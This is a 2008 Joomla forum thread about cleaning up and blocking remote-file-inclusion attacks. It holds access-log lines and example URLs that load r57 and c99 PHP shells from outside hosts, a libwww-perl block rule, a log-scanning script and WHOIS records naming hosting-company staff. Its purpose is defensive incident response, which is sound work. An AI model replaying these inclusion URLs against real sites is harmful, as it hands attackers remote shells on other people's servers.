Joomla Chicago CMS Group

JoomlaChicago Forum

TOPIC: Re:Security Question
#738
Diane Brunsting (User)
Security Question 9 Months, 2 Weeks ago
Is there a way to add a deny in the .htaccess to forbid redirects to .txt files? We were "hacked", so to speak, by someone using an r57.txt file which used custom_pages to redirect to

88.234.215.86 - "GET /template_css.css HTTP/1.1" 404 500 "index.php?option=com_custompages&cpage=http://www.evilc0der.com/r57.txt?" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9b5pre) Gecko/2008031806 Minefield/3.0b5pre"

This script tells you everything about the server, execute a command on a server, allows you to edit a file, upload a file, download a file, find suid files, eval PHP code, upload or download files from remote server, ftp-bruteforce, etc. Nice, eh?

We were hit at 12:03p and we found it at 12:17p. Removed it and all. Soon after, we had a ton of tries with various ending scripts:
80.67.21.105 - "GET /index.php?option=com_custompages&Itemid=62//index.php?option=com_custompages&cpage=http://www.xdccshare.helloweb.eu/stringa.txt? HTTP/1.1" 403 776 "-" "libwww-perl/5.808"
They didn't get anywhere at all, but they're persistent little b's.

The component was removed and we swept through the site and don't see anything other than a kiddie saying we were owned on the main page (not a very creative guy, btw) ... We spent hours upon hours checking every damn file not to mention looking at the database for odd info. Is there a way to absolutely make sure redirects to a txt file are denied?

Another thing we noticed was someone trying to do:
/classes/core/language.php?rootdir=http://bashdrfunk.fileave.com/t.txt???

It didn't work but as I said, I'd be more comfortable making sure that we can kill that altogether.

Another thing, shouldn't this work?
<IfModule setenvif_module>
# Anchored prefix match on the User-Agent; the original "^libwww-perl*" also matched, but its trailing "*" only repeats the final "l"
BrowserMatchNoCase ^libwww-perl evildoer
</IfModule>
# Apache 2.2 mod_authz_host syntax: refuse any request carrying the evildoer variable
Order Allow,Deny
Allow from all
Deny from env=evildoer


Thanks in advance.
Last Edit: 2008/03/22 23:08 By diabolka.
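An added example to go with the question above, not code from Diane's post or from Joomla: a small Python scanner that parses Apache combined-format access-log lines like the ones quoted and flags remote-file-include attempts, meaning a query parameter whose (decoded) value is itself a URL. It checks both the request line and the Referer, because the first quoted line carries the r57.txt URL only in its Referer, and it also tags libwww-perl user agents. The sample log lines are constructed to mirror the thread's; hosts and domains are placeholders, while the parameter names (cpage, mosConfig_absolute_path, rootdir) are the ones that appear in the thread.

```python
"""Flag remote-file-inclusion (RFI) attempts in Apache combined-format access logs.

Added example for this thread, not code from the original posts or from Joomla.
SAMPLE_LOG is constructed to mirror the lines quoted in the thread; hosts and
domains are placeholders.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# host ident [user [time]] "request" status bytes "referer" "user-agent"
# (the lines quoted in the thread omit user and time, so they are optional here)
LOG_RE = re.compile(
    r'^(?P<host>\S+)\s+\S+\s+(?:\S+\s+\[[^\]]+\]\s+)?'
    r'"(?P<request>[^"]*)"\s+(?P<status>\d{3})\s+\S+\s+'
    r'"(?P<referer>[^"]*)"\s+"(?P<ua>[^"]*)"'
)
# A parameter whose value is a URL is what an include()/require() on an
# unchecked request value turns into a remote shell (r57.txt, c99.txt, ...).
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)
SCANNER_UA_RE = re.compile(r'libwww-perl', re.IGNORECASE)


def remote_params(url):
    """Return (name, value) pairs whose percent-decoded value is a remote URL."""
    query = urlsplit(url).query
    return [(name, value) for name, value in parse_qsl(query, keep_blank_values=True)
            if REMOTE_URL_RE.match(value.strip())]


def analyze_line(line):
    """Parse one log line; return host, status and findings, or None if unparseable."""
    m = LOG_RE.match(line.strip())
    if m is None:
        return None
    findings = []
    parts = m.group('request').split()
    path = parts[1] if len(parts) >= 2 else m.group('request')
    for name, value in remote_params(path):
        findings.append(f'RFI attempt in request: {name}={value}')
    if m.group('referer') != '-':
        for name, value in remote_params(m.group('referer')):
            findings.append(f'RFI URL in referer: {name}={value}')
    if SCANNER_UA_RE.search(m.group('ua')):
        findings.append('scanner user-agent: ' + m.group('ua'))
    return {'host': m.group('host'), 'status': int(m.group('status')), 'findings': findings}


def scan(lines):
    """Return the analysis of every line that produced at least one finding."""
    results = []
    for line in lines:
        r = analyze_line(line)
        if r and r['findings']:
            results.append(r)
    return results


# Constructed sample, modelled on the thread's lines (placeholder hosts/domains).
SAMPLE_LOG = [
    # RFI URL carried only in the Referer of a follow-up request for a stylesheet
    '198.51.100.7 - "GET /template_css.css HTTP/1.1" 404 500 '
    '"index.php?option=com_custompages&cpage=http://attacker.example/r57.txt?" '
    '"Mozilla/5.0 (Windows; U; Windows NT 5.1) Gecko/2008031806 Minefield/3.0b5pre"',
    # RFI attempt in the request itself from a libwww-perl bot, refused with 403
    '203.0.113.9 - "GET /index.php?option=com_custompages&Itemid=62//index.php'
    '?option=com_custompages&cpage=http://attacker.example/stringa.txt? HTTP/1.1" '
    '403 776 "-" "libwww-perl/5.808"',
    # percent-encoded remote URL in a Joomla 1.0 era parameter
    '203.0.113.10 - "GET /?mosConfig_absolute_path=http%3A%2F%2Fattacker.example'
    '%2Fshell%2Fc99.txt%3F&act=tools HTTP/1.1" 200 1523 "-" "Mozilla/4.0"',
    # full combined format (ident, user and timestamp present), not refused
    '203.0.113.11 - - [22/Mar/2008:12:03:11 -0500] "GET /classes/core/language.php'
    '?rootdir=http://attacker.example/t.txt??? HTTP/1.1" 200 0 "-" "Mozilla/4.0"',
    # normal page view: must produce no findings
    '192.0.2.44 - "GET /index.php?option=com_content&task=view&id=12&Itemid=26 HTTP/1.1" '
    '200 8192 "http://www.example.org/" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for r in scan(SAMPLE_LOG):
        print(r['host'], r['status'], '; '.join(r['findings']))
```

Against a real log, feed `open('access.log')` to `scan()`. A flagged line that was answered with 403 or 404 was refused or never reached the component; a flagged line answered with 200 (or 500) is the one to pull apart, because the include was actually attempted, and every line from that host afterwards deserves a look.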
#739
Mike Carson (Admin)
Re:Security Question 9 Months, 2 Weeks ago
Diane,
Keep this website in your favorites. www.joomlarescue.com

This is Tom Canavan's website and he is the Joomla security guru of all Joomla gurus. He actually just helped me last weekend and also 2 other very large Joomla based commercial providers that were hacked within the past month. He is the absolute best when it comes to fixing hacked Joomla sites and getting them tightened up on any security holes. He is also one of our members and one of the speakers at JoomlaEXPO. I can't say enough good things about him.

I'll contact him and let him know that you need some help. He is very quick at helping people.
Thanks
Mike
#741
Tom Canavan (Admin)
Re:Security Question 9 Months, 2 Weeks ago
Hi Diane,

The code to block an IP is simple.

But the fact is they got in. Just blocking them at one IP won't get it.

In fact, I am working on one right now that's in Australia. They have a root kit - in fact they had the R57 shell, the VB.PHP shell and the C99 shell.

Sadly - they (bad guys) have completely compromised this server and it will have to be rebuilt.

I found another backdoor from a hacker site.

In any case, the block code would work for that, but there are soooooo many different ways.

Let me know if I can be of help -

Thanks

Tom
#742
Diane Brunsting (User)
Re:Security Question 9 Months, 2 Weeks ago
Blocking the IP, I'm doing but they're using a bot it seems so that doesn't help. I was hoping there was a way for the redirect to just die if it has a .txt? file extension in it.

I'm going to take another look at the server again but from the logs, they aren't able to get in. They were using the com_custompages to redirect to the r57 script. From the logs, initial filechecks, and datestamps, etc., I didn't see any other installations of files or anything untoward.

Here's hoping, I'm not wrong.
#743
Diane Brunsting (User)
Re:Security Question 9 Months, 2 Weeks ago
Any recommendations on what else I should be checking in the files/directories? Did your bad guys install things in certain directories or was it a free for all? Thanks.
Last Edit: 2008/03/22 23:36 By diabolka.
#745
Tom Canavan (Admin)
Re:Security Question 9 Months, 2 Weeks ago
Hour 5 in progress.

I have yet to eradicate all known instances of it.
http://www.thedomainnamehere//?mosConfig_absolute_path=http%3A%2F%2Fxxxx.us%2Fshell%2Fc99.txt%3F&act=tools&d=%2Fhome%2Fyyyyyy%2F

Fires up a LOVELY command shell..

Let's see... I could "kill" the process for the car lot running, I could stop exim running, I could format the server...

see - by the time they penetrate you to PUT a shell on...it might be bad

As a hint: look in EVERY index.* file in EVERY subdirectory.

Look for permissions wrong, etc. etc.

got a backup? If so I'd consider restoring.

Thanks

T

p.s. -- the above URL has been sanitized and will go nowhere.
#746
Tom Canavan (Admin)
Re:Security Question 9 Months, 2 Weeks ago
http://www.iana.org/assignments/port-numbers

check which ports are open also on your server.


btw - they WON'T like you checking (the host).
#747
Tom Canavan (Admin)
Re:Security Question 9 Months, 2 Weeks ago
role: TT Administrative Contact Role
address: Turk Telekom
address: Bilisim Aglari Dairesi
address: Aydinlikevler
address: 06103 ANKARA
phone: +90 312 313 1950
fax-no: +90 312 313 1949
e-mail: *****@ttnet.net.tr

your attacker hails from Turkey - or at least (potentially) wants you to believe so...

and your second attacker:
person: Tobias Marburg
address: domainfactory GmbH
address: Oskar-Messter-Str. 33
address: 85737 Ismaning
address: DE
phone: +49 89 55266 0
fax-no: +49 89 55266 222
e-mail: **@domainfactory.de
nic-hdl: TM1876-RIPE
notify: **@domainfactory.de
changed: **@domainfactory.de 20040706
source: RIPE
mnt-by: MNT-DOMAINFACTORY

person: Jochen Tuchbreiter
address: domainfactory GmbH
address: Oskar-Messter-Str. 33
address: 85737 Ismaning
address: DE
phone: +49 89 55266 112
fax-no: +49 89 55266 222
nic-hdl: JT218-RIPE
remarks: technical issues only please
mnt-by: MNT-DOMAINFACTORY
source: RIPE
abuse-mailbox: *****@ispgateway.de
changed: ***@domainfactory.de 20070608

is from Germany. Chances are you are root-kitted, but I'd advise my host. - Anyway - that's about it. Best of luck.
#748
Diane Brunsting (User)
Re:Security Question 9 Months, 2 Weeks ago
Thanks for the help here. One more question (forgive me - v. sick and exhausted so may not be too coherent here) -- for example:

If there is a script found in a directory my virtual server (and I) don't have access to, like, /var/tmp/ for example. Does this mean that it is the host's server itself that is compromised and in turn so am I and the other virtual hosts? Or just because a script is found in a directory outside my virtual server, that doesn't mean that it isn't just mine?

Did that make sense?
#749
Tom Canavan (Admin)
Re:Security Question 9 Months, 2 Weeks ago
You probably won't like this answer.

It Depends - it could be either situation or neither situation.

You could have a vulnerable version of J!, a vulnerable extension, you might have Front-Page Extensions running (a hole in and of itself), etc.

If the physical server is infected, then yes, you got it from them. If your site ONLY is infected, then you have a localized (but severe) problem.

Hope you feel better.

Happy Easter all!

T